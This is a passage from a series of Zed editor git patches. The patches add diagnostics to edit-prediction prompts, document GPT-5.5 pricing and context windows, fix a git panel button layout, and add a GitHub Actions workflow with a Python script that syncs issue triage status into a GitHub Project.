ZetaFormat::V0318SeedMultiRegions => 4096, + ZetaFormat::V0420Diagnostics => 8192, ZetaFormat::V0327SingleFile => 16384, }; @@ -696,7 +715,8 @@ pub fn format_prompt_with_budget_for_format( let empty_files = Vec::new(); let input_related_files = input.related_files.as_deref().unwrap_or(&empty_files); let filtered_related_files = if let Some(cursor_excerpt_start_row) = input.excerpt_start_row { - let relative_row_range = offset_range_to_row_range(&input.cursor_excerpt, context_range); + let relative_row_range = + offset_range_to_row_range(&input.cursor_excerpt, context_range.clone()); let row_range = relative_row_range.start + cursor_excerpt_start_row ..relative_row_range.end + cursor_excerpt_start_row; filter_redundant_excerpts( @@ -719,6 +739,7 @@ pub fn format_prompt_with_budget_for_format( | ZetaFormat::V0317SeedMultiRegions | ZetaFormat::V0420Diagnostics => { let mut cursor_section = String::new(); + write_cursor_excerpt_section_for_format( format, &mut cursor_section, @@ -728,9 +749,13 @@ pub fn format_prompt_with_budget_for_format( cursor_offset, ); - if format == ZetaFormat::V0420Diagnostics { - cursor_section.push_str(&format_active_buffer_diagnostics(input)); - } + let cursor_buffer_row = input.excerpt_start_row.map(|excerpt_start_row| { + excerpt_start_row + + input.cursor_excerpt[..context_range.start + cursor_offset] + .bytes() + .filter(|byte| *byte == b'\n') + .count() as u32 + }); let budget_with_margin = apply_prompt_budget_margin(max_tokens); seed_coder::assemble_fim_prompt( @@ -739,6 +764,12 @@ pub fn format_prompt_with_budget_for_format( &cursor_section, &input.events, related_files, + if format == ZetaFormat::V0420Diagnostics { + &input.active_buffer_diagnostics + } else { + &[] + }, + cursor_buffer_row, budget_with_margin, ) } @@ -807,24 +838,60 @@ pub fn format_prompt_with_budget_for_format( return Some(prompt); } -fn format_active_buffer_diagnostics(input: &ZetaPromptInput) -> String { - let mut output = format!("{}diagnostics\n", seed_coder::FILE_MARKER); +fn format_active_buffer_diagnostics_with_budget( + diagnostics: &[ActiveBufferDiagnostic], + cursor_buffer_row: Option, + budget: usize, +) -> String { + if diagnostics.is_empty() || budget == 0 { + return String::new(); + } - if input.active_buffer_diagnostics.is_empty() { - output.push_str("No Diagnostics\n"); - return output; + let mut diagnostic_indices = (0..diagnostics.len()).collect::>(); + if let Some(cursor_buffer_row) = cursor_buffer_row { + diagnostic_indices.sort_by_key(|index| { + let range = &diagnostics[*index].snippet_buffer_row_range; + u32::abs_diff(cursor_buffer_row, range.start) + + u32::abs_diff(cursor_buffer_row, range.end) + }); } - for diagnostic in &input.active_buffer_diagnostics { - writeln!( - output, - "*{}*:\n```\n{}\n```", - diagnostic.message, diagnostic.snippet - ) - .ok(); + let mut output = format!("{}diagnostics\n", seed_coder::FILE_MARKER); + let header_tokens = estimate_tokens(output.len()); + if header_tokens > budget { + return String::new(); } - output + let mut used_tokens = header_tokens; + let mut included_diagnostics = 0; + for diagnostic_index in diagnostic_indices.into_iter().take(10) { + let diagnostic = &diagnostics[diagnostic_index]; + let snippet = clamp_text_to_token_count(&diagnostic.snippet, 256); + + let diagnostic_section = format!( + "*{}*:\n```\n{}{}\n```\n", + diagnostic.message, + snippet, + if snippet.len() < diagnostic.snippet.len() { + "..." + } else { + "" + } + ); + let diagnostic_tokens = estimate_tokens(diagnostic_section.len()); + if used_tokens + diagnostic_tokens > budget { + break; + } + output.push_str(&diagnostic_section); + used_tokens += diagnostic_tokens; + included_diagnostics += 1; + } + + if included_diagnostics == 0 { + String::new() + } else { + output + } } pub fn filter_redundant_excerpts( @@ -3363,6 +3430,7 @@ pub mod seed_coder { cursor_offset: usize, events: &[Arc], related_files: &[RelatedFile], + diagnostics: &[ActiveBufferDiagnostic], max_tokens: usize, ) -> String { let cursor_prefix_section = @@ -3373,6 +3441,8 @@ pub mod seed_coder { &cursor_prefix_section, events, related_files, + diagnostics, + None, max_tokens, ) } @@ -3383,6 +3453,8 @@ pub mod seed_coder { cursor_prefix_section: &str, events: &[Arc], related_files: &[RelatedFile], + diagnostics: &[ActiveBufferDiagnostic], + cursor_buffer_row: Option, max_tokens: usize, ) -> String { let suffix_section = build_suffix_section(context, editable_range); @@ -3399,19 +3471,30 @@ pub mod seed_coder { max_edit_event_count_for_format(&ZetaFormat::V0211SeedCoder), ); let edit_history_tokens = estimate_tokens(edit_history_section.len() + "\n".len()); - let budget_after_edit_history = - budget_after_cursor.saturating_sub(edit_history_tokens + "\n".len()); + let budget_after_edit_history = budget_after_cursor.saturating_sub(edit_history_tokens); + + let diagnostics_section = super::format_active_buffer_diagnostics_with_budget( + diagnostics, + cursor_buffer_row, + budget_after_edit_history, + ); + let diagnostics_tokens = estimate_tokens(diagnostics_section.len() + "\n".len()); + let budget_after_diagnostics = budget_after_edit_history.saturating_sub(diagnostics_tokens); let related_files_section = super::format_related_files_within_budget( related_files, FILE_MARKER, "", - budget_after_edit_history, + budget_after_diagnostics, ); let mut prompt = String::new(); prompt.push_str(&suffix_section); prompt.push_str(FIM_PREFIX); + prompt.push_str(&diagnostics_section); + if !diagnostics_section.is_empty() { + prompt.push('\n'); + } prompt.push_str(&related_files_section); if !related_files_section.is_empty() { prompt.push('\n'); @@ -5206,7 +5289,7 @@ mod tests { } #[test] - fn test_v0420_formats_diagnostics_after_cursor_file() { + fn test_v0420_formats_diagnostics_before_related_files() { let mut input = make_input( "prefix\neditable\nsuffix", 7..15, @@ -5231,17 +5314,18 @@ mod tests { indoc! {r#" <[fim-suffix]> suffix - <[fim-prefix]>related.rs + <[fim-prefix]>diagnostics + *missing semicolon*: + ``` + let value = 1 + ``` + + related.rs fn helper() {} test.rs prefix <|marker_1|>edi<|user_cursor|>table<|marker_2|> - diagnostics - *missing semicolon*: - ``` - let value = 1 - ``` <[fim-middle]>"#} ); } From f7537eed42961d250ac9fc65ce47b9bed1ce7657 Mon Sep 17 00:00:00 2001 From: morgankrey Date: Tue, 5 May 2026 12:17:59 -0500 Subject: [PATCH 206/231] Add GPT-5.5 and GPT-5.5 pro model documentation (#55795) ## Summary - Add pricing table entries for GPT-5.5 and GPT-5.5 pro - Add context window entries for GPT-5.5/5.5 pro (272k) - Fix context window values for all OpenAI models from 400k to 272k to match actual cloud-enforced limit - Update student plan note to exclude GPT-5.5 pro - Update page description Follows up on #54820 which added code support for GPT-5.5 models. The 272k limit is enforced in the cloud due to context-tiered pricing not yet being implemented. ## Test plan - [ ] Verify pricing matches cloud repo configuration - [ ] Check docs render correctly Release Notes: - N/A --- docs/src/ai/models.md | 25 ++++++++++++++++--------- 1 file changed, 16 insertions(+), 9 deletions(-) diff --git a/docs/src/ai/models.md b/docs/src/ai/models.md index da2f1945725682..e2d0c1c83cd048 100644 --- a/docs/src/ai/models.md +++ b/docs/src/ai/models.md @@ -1,13 +1,13 @@ --- title: AI Models and Pricing - Zed -description: AI models available via Zed Pro including Claude, GPT-5.4, Gemini 3.1 Pro, and Grok. Pricing, context windows, and tool call support. +description: AI models available via Zed Pro including Claude, GPT-5.5, Gemini 3.1 Pro, and Grok. Pricing, context windows, and tool call support. --- # Models Zed's plans offer hosted versions of major LLMs with higher rate limits than direct API access. Model availability is updated regularly. To use your own API keys instead, see [LLM Providers](./llm-providers.md). For general setup, see [Configuration](./configuration.md). -> **Note:** Claude Opus models and GPT-5.4 pro are not available on the [Student plan](./plans-and-usage.md#student). +> **Note:** Claude Opus models, GPT-5.5 pro, and GPT-5.4 pro are not available on the [Student plan](./plans-and-usage.md#student). | Model | Provider | Token Type | Provider Price per 1M tokens | Zed Price per 1M tokens | | ---------------------- | --------- | ------------------- | ---------------------------- | ----------------------- | @@ -35,6 +35,11 @@ Zed's plans offer hosted versions of major LLMs with higher rate limits than dir | | Anthropic | Output | $5.00 | $5.50 | | | Anthropic | Input - Cache Write | $1.25 | $1.375 | | | Anthropic | Input - Cache Read | $0.10 | $0.11 | +| GPT-5.5 pro | OpenAI | Input | $30.00 | $33.00 | +| | OpenAI | Output | $180.00 | $198.00 | +| GPT-5.5 | OpenAI | Input | $5.00 | $5.50 | +| | OpenAI | Output | $30.00 | $33.00 | +| | OpenAI | Cached Input | $0.50 | $0.55 | | GPT-5.4 pro | OpenAI | Input | $30.00 | $33.00 | | | OpenAI | Output | $180.00 | $198.00 | | GPT-5.4 | OpenAI | Input | $2.50 | $2.75 | @@ -102,13 +107,15 @@ A context window is the maximum span of text and code an LLM can consider at onc | Claude Sonnet 4.5 | Anthropic | 200k | | Claude Sonnet 4.6 | Anthropic | 1M | | Claude Haiku 4.5 | Anthropic | 200k | -| GPT-5.4 pro | OpenAI | 400k | -| GPT-5.4 | OpenAI | 400k | -| GPT-5.3-Codex | OpenAI | 400k | -| GPT-5.2 | OpenAI | 400k | -| GPT-5.2-Codex | OpenAI | 400k | -| GPT-5 mini | OpenAI | 400k | -| GPT-5 nano | OpenAI | 400k | +| GPT-5.5 pro | OpenAI | 272k input / 400k total | +| GPT-5.5 | OpenAI | 272k input / 400k total | +| GPT-5.4 pro | OpenAI | 272k input / 400k total | +| GPT-5.4 | OpenAI | 272k input / 400k total | +| GPT-5.3-Codex | OpenAI | 272k input / 400k total | +| GPT-5.2 | OpenAI | 272k input / 400k total | +| GPT-5.2-Codex | OpenAI | 272k input / 400k total | +| GPT-5 mini | OpenAI | 272k input / 400k total | +| GPT-5 nano | OpenAI | 272k input / 400k total | | Gemini 3.1 Pro | Google | 200k | | Gemini 3 Flash | Google | 200k | | Grok 4 | X.ai | 128k | From 819ecb240991706d291f5310cc545cfe4f4a0cbc Mon Sep 17 00:00:00 2001 From: Remco Smits Date: Tue, 5 May 2026 19:33:57 +0200 Subject: [PATCH 207/231] git_panel: Fix commit message text behind `Open Commit Modal` button (#55565) This PR fixes an issue where the your commit message inside the git panel commit editor could be behind the `Open Commit Modal` button. **Before** Screenshot 2026-05-03 at 18 11 33 **After** Screenshot 2026-05-05 at 18 18 58 Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - Fix git commit message editor text could be behind the `Open Commit Modal` button --- crates/git_ui/src/git_panel.rs | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/crates/git_ui/src/git_panel.rs b/crates/git_ui/src/git_panel.rs index d4cf03c853848a..820c880a1bd19a 100644 --- a/crates/git_ui/src/git_panel.rs +++ b/crates/git_ui/src/git_panel.rs @@ -4535,7 +4535,7 @@ impl GitPanel { .child(EditorElement::new(&self.commit_editor, panel_editor_style)), ) .child( - h_flex() + v_flex() .absolute() .top_2() .right_2() From 786799ff1e08fdb4515a9327f6d144e94fff13e7 Mon Sep 17 00:00:00 2001 From: Lucas White Date: Tue, 5 May 2026 10:57:43 -0700 Subject: [PATCH 208/231] Add issue triage project sync workflow (#55796) Auto-syncs derived fields on a private GitHub Project (#84) from issue labels and comment activity. Goal is to more effectively track issue states and make sure we're triaging, closing the loop when possible/relevant. Self-Review Checklist: - [ x] I've reviewed my own diff for quality, security, and reliability - [ x] Unsafe blocks (if any) have justifying comments - [ n/a] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ n/a] Tests cover the new/changed behavior - [ n/a] Performance impact has been considered and is acceptable Closes #ISSUE Release Notes: - N/A --- .github/workflows/triage_project_sync.yml | 173 +++++ script/triage_project_sync.py | 828 ++++++++++++++++++++++ 2 files changed, 1001 insertions(+) create mode 100644 .github/workflows/triage_project_sync.yml create mode 100644 script/triage_project_sync.py diff --git a/.github/workflows/triage_project_sync.yml b/.github/workflows/triage_project_sync.yml new file mode 100644 index 00000000000000..b652e0fb0a79ac --- /dev/null +++ b/.github/workflows/triage_project_sync.yml @@ -0,0 +1,173 @@ +# Sync triage state into "Zed weekly triage" (project #84). +# +# Runs in two modes: +# 1. Event-driven (primary): fires on issue events + new issue comments. +# Re-derives Status / Stale since / Aged? / Intake week for that one +# issue. Latency: ~10–30 seconds end-to-end. +# 2. Daily cron (safety net): re-derives across all project items at 06:00 +# UTC. Catches any events that GH dropped under load. +# +# Auth: GitHub App `ZED_COMMUNITY_BOT_APP_ID` with +# `Organization Projects: Read and write` permission added. Token is +# requested with `owner: zed-industries` so it can mutate org-level project +# items (the default repo-scoped token is insufficient for org projects). +# +# This workflow only mutates the triage project (#84). It does not write +# labels, comments, or any issue metadata. Adding any other write capability +# requires a separate workflow. + +name: Triage Project Sync (#84) + +on: + issues: + types: + - opened + - reopened + - closed + - labeled + - unlabeled + - assigned + - unassigned + - edited + issue_comment: + types: [created] + schedule: + - cron: "0 6 * * *" # daily 06:00 UTC + workflow_dispatch: + inputs: + issue_number: + description: "Issue number to sync (leave blank to sync all)" + type: number + required: false + dry_run: + description: "Dry run (compute but don't mutate)" + type: boolean + default: false + +# Coalesce rapid event bursts on the same issue (e.g., 5 labels added at once +# = 5 events). Cancel any in-progress run for the same issue when a new event +# arrives — the latest run will compute the most up-to-date state. +concurrency: + group: triage-sync-${{ github.event.issue.number || github.run_id }} + cancel-in-progress: true + +# Default to no permissions for any job in this workflow. The single job below +# explicitly opts back in to `contents: read` for the sparse checkout. If a +# future job is added without its own `permissions:` block, it will inherit +# this empty default rather than the repo-wide token defaults. +permissions: {} + +jobs: + sync: + name: Sync triage project + # Run only on the canonical repo (not forks); skip PR comments since this + # workflow is for issues only. + if: | + github.repository == 'zed-industries/zed' && + (github.event_name != 'issue_comment' || github.event.issue.pull_request == null) + runs-on: ubuntu-latest + timeout-minutes: 15 + permissions: + contents: read + + steps: + - name: Checkout (sparse — script only) + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd # v5.0.1 + with: + sparse-checkout: script/triage_project_sync.py + sparse-checkout-cone-mode: false + # Don't write GITHUB_TOKEN into .git/config. We never push from this + # workflow; we only read one file. Keeps the token out of any + # filesystem state that subsequent steps could access. + persist-credentials: false + + - name: Get App installation token + id: token + uses: actions/create-github-app-token@f8d387b68d61c58ab83c6c016672934102569859 # v3.0.0 + with: + app-id: ${{ secrets.ZED_COMMUNITY_BOT_APP_ID }} + private-key: ${{ secrets.ZED_COMMUNITY_BOT_PRIVATE_KEY }} + # IMPORTANT: org-scoped token is required for org-level project + # mutations. Without `owner:`, the default token is repo-scoped and + # cannot write to org projects. + owner: zed-industries + # Scope the token down to the minimum needed for this workflow. + # Even though the App may have broader permissions for other + # automations (e.g., Issues:Write for the dupe-bot), this token + # only carries what we list below. Per the action's docs, an + # unrequested permission is *not* available on the resulting token. + # + # Required: + # - organization-projects:write — mutate project items + read + # project schema + # - members:read — query the `staff` team membership + # - issues:read — fetch issue body, labels, comments + # - metadata:read — always required for any GH API access + permission-organization-projects: write + permission-members: read + permission-issues: read + permission-metadata: read + + - name: Setup Python + uses: actions/setup-python@a26af69be951a213d495a4c3e4e4022e16d87065 # v5.6.0 + with: + python-version: "3.12" + + - name: Install dependencies + run: pip install requests + + - name: Sync (event-driven, single issue) + if: github.event_name == 'issues' || github.event_name == 'issue_comment' + env: + GITHUB_TOKEN: ${{ steps.token.outputs.token }} + ISSUE_NUMBER: ${{ github.event.issue.number }} + run: | + python script/triage_project_sync.py --issue "$ISSUE_NUMBER" + + - name: Sync (cron, all items) + if: github.event_name == 'schedule' + env: + GITHUB_TOKEN: ${{ steps.token.outputs.token }} + run: | + python script/triage_project_sync.py --all + + - name: Sync (manual dispatch — single) + if: github.event_name == 'workflow_dispatch' && inputs.issue_number != '' + env: + GITHUB_TOKEN: ${{ steps.token.outputs.token }} + ISSUE_NUMBER: ${{ inputs.issue_number }} + DRY_RUN: ${{ inputs.dry_run }} + run: | + if [ "$DRY_RUN" = "true" ]; then + python script/triage_project_sync.py --issue "$ISSUE_NUMBER" --dry-run + else + python script/triage_project_sync.py --issue "$ISSUE_NUMBER" + fi + + - name: Sync (manual dispatch — all) + if: github.event_name == 'workflow_dispatch' && inputs.issue_number == '' + env: + GITHUB_TOKEN: ${{ steps.token.outputs.token }} + DRY_RUN: ${{ inputs.dry_run }} + run: | + if [ "$DRY_RUN" = "true" ]; then + python script/triage_project_sync.py --all --dry-run + else + python script/triage_project_sync.py --all + fi + + - name: Write summary + if: always() + env: + EVENT_NAME: ${{ github.event_name }} + ISSUE_NUMBER: ${{ github.event.issue.number }} + run: | + { + echo "## Triage sync summary" + echo "" + echo "- Event: \`$EVENT_NAME\`" + if [ -n "$ISSUE_NUMBER" ]; then + echo "- Issue: #$ISSUE_NUMBER" + fi + echo "- Project: [#84 Zed weekly triage](https://github.com/orgs/zed-industries/projects/84)" + } >> "$GITHUB_STEP_SUMMARY" diff --git a/script/triage_project_sync.py b/script/triage_project_sync.py new file mode 100644 index 00000000000000..239ae9f7ab4823 --- /dev/null +++ b/script/triage_project_sync.py @@ -0,0 +1,828 @@ +#!/usr/bin/env python3 +""" +triage_project_sync.py +====================== + +Sync triage state from `zed-industries/zed` issues into the +"Zed weekly triage" project (#84). + +Auto-derives `Status`, `Stale since`, `Aged?`, `Intake week` from issue labels ++ comment activity + assignees. Mutates the project to +reflect the derived state. + +The labels and the issue thread are the source of truth. The project is a +*derived view* — manual edits to the synced fields will be overwritten on the +next sync. + +Modes +----- + --issue N Sync a single issue. Used by GH Actions on issue events. + --all Sync every item currently in the project. Used by daily + cron as a safety net. + --dry-run Compute derivations and log them, but don't mutate the + project. Safe for local testing / first deploy. + +Auth +---- +Reads `GITHUB_TOKEN` from env. For production, this is an installation token +from the `ZED_COMMUNITY_BOT_APP_ID` GitHub App, scoped to +`owner: zed-industries`, with `Organization Projects: Read and write`. + +For local `--dry-run` testing, a personal token with `repo, read:org, +read:project` is sufficient. + +Idempotency / safety +-------------------- +- Every run re-derives all fields from current issue state. Running twice + produces the same result as once. +- Failures on a single issue (in `--all` mode) are logged and the run + continues. One bad item doesn't poison the batch. +- `--dry-run` makes no GraphQL mutations and no REST writes. + +Dependencies +------------ + pip install requests +""" + +from __future__ import annotations + +import argparse +import json +import os +import sys +import time +from dataclasses import dataclass +from datetime import datetime, timedelta, timezone + +import requests + +# --------------------------------------------------------------------------- +# Constants + +REPO_OWNER = "zed-industries" +REPO_NAME = "zed" +REPO = f"{REPO_OWNER}/{REPO_NAME}" + +PROJECT_NUMBER = 84 +PROJECT_OWNER = REPO_OWNER + +STAFF_TEAM_SLUG = "staff" + +# Status names. MUST match the option names configured in project #84. +# (Casing matters — GH Projects single-select option matching is case-sensitive.) +STATUS_NEEDS_LABELS = "Needs labels" +STATUS_NEEDS_REPRO_ATTEMPT = "Needs repro attempt" +STATUS_USER_REPLIED = "User replied (review)" +STATUS_AWAITING_USER = "Awaiting user" +STATUS_RESPONDED_NO_REPRO = "Responded, no repro" +STATUS_AWAITING_EXTERNAL_REPRO = "Awaiting external repro" # not auto-set; placeholder +STATUS_REPRODUCIBLE = "Reproducible" +STATUS_HANDOFF = "Handoff" +STATUS_HANDOFF_INCOMPLETE = "Handoff (incomplete)" +STATUS_CLAIMED_COMMUNITY = "Claimed by community" +STATUS_CLOSED = "Closed" +STATUS_UNKNOWN = "Unknown" + +# Aging thresholds (days) per spec. +SUBSTANTIVE_COMMENT_MIN_LEN = 50 +AGE_THRESHOLDS_DAYS = { + STATUS_NEEDS_LABELS: 7, + STATUS_NEEDS_REPRO_ATTEMPT: 7, + STATUS_AWAITING_USER: 14, + STATUS_USER_REPLIED: 3, +} + +TERMINAL_OR_RESTING_STATUSES = { + STATUS_REPRODUCIBLE, + STATUS_HANDOFF, + STATUS_CLOSED, + STATUS_RESPONDED_NO_REPRO, + STATUS_CLAIMED_COMMUNITY, +} + +# Issue types that aren't triage work items — administrative collections, +# dashboards, and trackers. The sync detects these and skips field updates; +# they remain in the project (auto-add put them there) but with empty fields, +# invisible in any status-filtered view. Manually remove them in the UI if +# they're cluttering the all-items list. +SKIP_ISSUE_TYPES = {"Meta", "Tracking"} + +REST_API = "https://api.github.com" +GRAPHQL_API = "https://api.github.com/graphql" + +NOW = datetime.now(timezone.utc) + + +# --------------------------------------------------------------------------- +# Logging + + +def log(msg: str, level: str = "INFO") -> None: + ts = datetime.now(timezone.utc).strftime("%H:%M:%S") + print(f"[{ts}] [{level}] {msg}", file=sys.stderr, flush=True) + + +# --------------------------------------------------------------------------- +# Auth + + +def get_token() -> str: + token = os.environ.get("GITHUB_TOKEN", "").strip() + if not token: + sys.exit("ERROR: GITHUB_TOKEN env var is required") + return token + + +_TOKEN: str | None = None + + +def headers_rest() -> dict[str, str]: + return { + "Authorization": f"Bearer {_TOKEN}", + "Accept": "application/vnd.github+json", + "X-GitHub-Api-Version": "2022-11-28", + } + + +def headers_graphql() -> dict[str, str]: + return {"Authorization": f"Bearer {_TOKEN}", "Content-Type": "application/json"} + + +# --------------------------------------------------------------------------- +# REST + + +def rest_get(path: str, params: dict | None = None, retries: int = 3) -> dict | list: + url = f"{REST_API}/{path.lstrip('/')}" + last_err: Exception | None = None + for attempt in range(retries): + try: + r = requests.get(url, headers=headers_rest(), params=params, timeout=30) + if r.status_code == 200: + return r.json() + if r.status_code in (429, 502, 503, 504): + wait = 2**attempt * 2 + log(f"REST {r.status_code} on {path}; retry in {wait}s", "WARN") + time.sleep(wait) + continue + log(f"REST GET {path} failed: {r.status_code} {r.text[:200]}", "ERROR") + r.raise_for_status() + except requests.RequestException as e: + last_err = e + wait = 2**attempt * 2 + log(f"REST GET {path} threw {e}; retry in {wait}s", "WARN") + time.sleep(wait) + raise RuntimeError(f"REST GET {path} failed after {retries} retries: {last_err}") + + +def rest_get_paginated(path: str, params: dict | None = None, max_pages: int = 20) -> list: + p = dict(params or {}) + p["per_page"] = 100 + out: list = [] + for page in range(1, max_pages + 1): + p["page"] = page + items = rest_get(path, p) + if not items: + break + if not isinstance(items, list): + log(f"REST {path} page {page} returned non-list", "WARN") + break + out.extend(items) + if len(items) < 100: + break + return out + + +# --------------------------------------------------------------------------- +# GraphQL + + +def graphql(query: str, variables: dict | None = None, retries: int = 3) -> dict: + payload = {"query": query, "variables": variables or {}} + last_err: Exception | None = None + for attempt in range(retries): + try: + r = requests.post(GRAPHQL_API, headers=headers_graphql(), json=payload, timeout=30) + if r.status_code == 200: + data = r.json() + if "errors" in data: + log(f"GraphQL errors: {json.dumps(data['errors'])[:400]}", "ERROR") + raise RuntimeError("GraphQL returned errors") + return data["data"] + if r.status_code in (429, 502, 503, 504): + wait = 2**attempt * 2 + log(f"GraphQL {r.status_code}; retry in {wait}s", "WARN") + time.sleep(wait) + continue + log(f"GraphQL HTTP {r.status_code}: {r.text[:300]}", "ERROR") + r.raise_for_status() + except requests.RequestException as e: + last_err = e + wait = 2**attempt * 2 + log(f"GraphQL threw {e}; retry in {wait}s", "WARN") + time.sleep(wait) + raise RuntimeError(f"GraphQL failed after {retries} retries: {last_err}") + + +# --------------------------------------------------------------------------- +# Issue data fetch + + +@dataclass +class IssueData: + number: int + node_id: str + title: str + state: str # "open" / "closed" + closed_at: datetime | None + created_at: datetime + reporter: str + assignees: list[str] + labels: list[str] + issue_type: str | None # e.g. "Bug", "Crash", "Meta", "Tracking", or None + is_pull_request: bool + comments: list[dict] + + +def parse_dt(s: str | None) -> datetime | None: + if not s: + return None + return datetime.fromisoformat(s.replace("Z", "+00:00")) + + +def fetch_issue(number: int) -> IssueData: + issue = rest_get(f"repos/{REPO}/issues/{number}") + if not isinstance(issue, dict): + raise RuntimeError(f"unexpected response for issue {number}") + comments = rest_get_paginated(f"repos/{REPO}/issues/{number}/comments") + created_at = parse_dt(issue["created_at"]) + if created_at is None: + raise RuntimeError(f"issue {number} has no created_at") + issue_type = None + if isinstance(issue.get("type"), dict): + issue_type = issue["type"].get("name") + return IssueData( + number=number, + node_id=issue["node_id"], + title=issue["title"], + state=issue["state"], + closed_at=parse_dt(issue.get("closed_at")), + created_at=created_at, + reporter=issue["user"]["login"], + assignees=[a["login"] for a in (issue.get("assignees") or [])], + labels=[l["name"] for l in issue["labels"]], + issue_type=issue_type, + is_pull_request="pull_request" in issue, + comments=comments, + ) + + +# --------------------------------------------------------------------------- +# Staff team + + +_STAFF: set[str] | None = None + + +def fetch_staff() -> set[str]: + global _STAFF + if _STAFF is not None: + return _STAFF + members = rest_get_paginated(f"orgs/{REPO_OWNER}/teams/{STAFF_TEAM_SLUG}/members") + _STAFF = {m["login"] for m in members} + log(f"loaded {len(_STAFF)} staff members") + return _STAFF + + +def is_bot(user: dict) -> bool: + return user.get("type") == "Bot" or user.get("login", "").endswith("[bot]") + + +def is_substantive_staff_comment(comment: dict, staff: set[str]) -> bool: + user = comment.get("user", {}) + if user.get("login") not in staff or is_bot(user): + return False + body = comment.get("body") or "" + if len(body) >= SUBSTANTIVE_COMMENT_MIN_LEN: + return True + # Cheap attachment heuristic: looks for media tokens or attachment hosts. + if any( + m in body + for m in ( + "user-attachments/assets", + ".png", + ".jpg", + ".jpeg", + ".gif", + ".mp4", + ".webm", + ".mov", + ) + ): + return True + return False + + +def latest_reporter_activity(issue: IssueData) -> datetime: + times = [issue.created_at] + for c in issue.comments: + if c["user"]["login"] == issue.reporter: + t = parse_dt(c["created_at"]) + if t: + times.append(t) + return max(times) + + +# --------------------------------------------------------------------------- +# Derivation rules +# (Mirrors the spec's R0-R6 cascade. Keep in sync with +# spec.md → "Status derivation rules".) + + +def derive_status(issue: IssueData, staff: set[str]) -> tuple[str, str, str]: + """Returns (status, rule_id, why).""" + L = set(issue.labels) + + if issue.closed_at is not None: + return STATUS_CLOSED, "R1", "issue is closed" + + if "state:claimed by community" in L: + return STATUS_CLAIMED_COMMUNITY, "R0", "state:claimed by community label" + + if "state:reproducible" in L: + if issue.assignees: + return STATUS_REPRODUCIBLE, "R2a", f"reproducible, assignee={','.join(issue.assignees)}" + # R2b vs R2c: any substantive staff comment in the thread? + substantive = None + for c in issue.comments: + if is_substantive_staff_comment(c, staff): + substantive = c + if substantive: + return ( + STATUS_HANDOFF, + "R2b", + f"reproducible, no assignee, staff context @ {substantive['created_at']} " + f"({len(substantive['body'])} chars by @{substantive['user']['login']})", + ) + return ( + STATUS_HANDOFF_INCOMPLETE, + "R2c", + "reproducible, no assignee, no substantive staff comment — close the loop", + ) + + if "state:needs triage" in L: + return STATUS_NEEDS_LABELS, "R3", "state:needs triage label present" + + if "state:needs info" in L: + last_staff = None + for c in issue.comments: + if c["user"]["login"] in staff and not is_bot(c["user"]): + last_staff = c + if last_staff is None: + return STATUS_AWAITING_USER, "R4a", "needs info, no staff comment yet" + last_comment = issue.comments[-1] if issue.comments else None + if last_comment is not None: + author = last_comment["user"]["login"] + non_staff = author not in staff and not is_bot(last_comment["user"]) + if non_staff: + ct = parse_dt(last_comment["created_at"]) + st = parse_dt(last_staff["created_at"]) + if ct and st and ct > st: + relation = "reporter" if author == issue.reporter else "third-party" + return ( + STATUS_USER_REPLIED, + "R4b", + f"{relation} (@{author}) replied {ct.isoformat()} after staff @ {st.isoformat()}", + ) + return ( + STATUS_AWAITING_USER, + "R4a", + f"last staff comment @ {last_staff['created_at']}, no non-staff reply since", + ) + + if "state:needs repro" in L: + cutoff = latest_reporter_activity(issue) + for c in reversed(issue.comments): + ct = parse_dt(c["created_at"]) + if ct and ct > cutoff and is_substantive_staff_comment(c, staff): + return ( + STATUS_RESPONDED_NO_REPRO, + "R5b", + f"staff comment {len(c['body'])} chars by @{c['user']['login']} @ {c['created_at']}", + ) + return STATUS_NEEDS_REPRO_ATTEMPT, "R5a", "no substantive staff comment after reporter's last activity" + + return STATUS_UNKNOWN, "R6", f"open with no recognized state label (labels: {sorted(L) or ''})" + + +def derive_stale_since( + issue: IssueData, status: str, staff: set[str] +) -> datetime | None: + """Returns the timestamp anchor used to measure aging, or None.""" + if status in TERMINAL_OR_RESTING_STATUSES or status == STATUS_UNKNOWN: + return None + if status == STATUS_NEEDS_LABELS: + return issue.created_at + if status == STATUS_NEEDS_REPRO_ATTEMPT: + return latest_reporter_activity(issue) + if status == STATUS_AWAITING_USER: + last_staff = None + for c in issue.comments: + if c["user"]["login"] in staff and not is_bot(c["user"]): + last_staff = c + return parse_dt(last_staff["created_at"]) if last_staff else issue.created_at + if status == STATUS_USER_REPLIED: + last_non_staff = None + for c in issue.comments: + u = c["user"] + if u["login"] not in staff and not is_bot(u): + last_non_staff = c + return parse_dt(last_non_staff["created_at"]) if last_non_staff else None + if status == STATUS_HANDOFF_INCOMPLETE: + # Spec: when state:reproducible was applied. Approximation for v0: + # issue.created_at as a weak proxy. Replacing with timeline event lookup + # is a "parked" item. + return issue.created_at + return None + + +def derive_aged(status: str, stale_since: datetime | None) -> tuple[str, str]: + """Returns ('Yes' | 'No', why).""" + if status == STATUS_HANDOFF_INCOMPLETE: + return "Yes", "always-flagged for loop closure" + if status in TERMINAL_OR_RESTING_STATUSES or status == STATUS_UNKNOWN: + return "No", "terminal/resting" + if not stale_since: + return "No", "no stale_since (status not aged-tracked)" + if status not in AGE_THRESHOLDS_DAYS: + return "No", f"status {status} not aged-tracked" + age = NOW - stale_since + threshold = AGE_THRESHOLDS_DAYS[status] + if age > timedelta(days=threshold): + return "Yes", f"{status} for {age.days}d (>{threshold}d)" + return "No", f"{status} for {age.days}d (≤{threshold}d)" + + +# --------------------------------------------------------------------------- +# Project schema cache +# Discovered at runtime by name so the script doesn't break if field IDs +# change (e.g., project recreated). Project number is stable config. + + +_PROJECT_SCHEMA: dict | None = None + + +def fetch_project_schema() -> dict: + """Returns {'id', 'fields_by_name'} where fields_by_name maps name → field dict.""" + global _PROJECT_SCHEMA + if _PROJECT_SCHEMA is not None: + return _PROJECT_SCHEMA + query = """ + query($owner: String!, $number: Int!) { + organization(login: $owner) { + projectV2(number: $number) { + id + fields(first: 30) { + nodes { + __typename + ... on ProjectV2Field { id 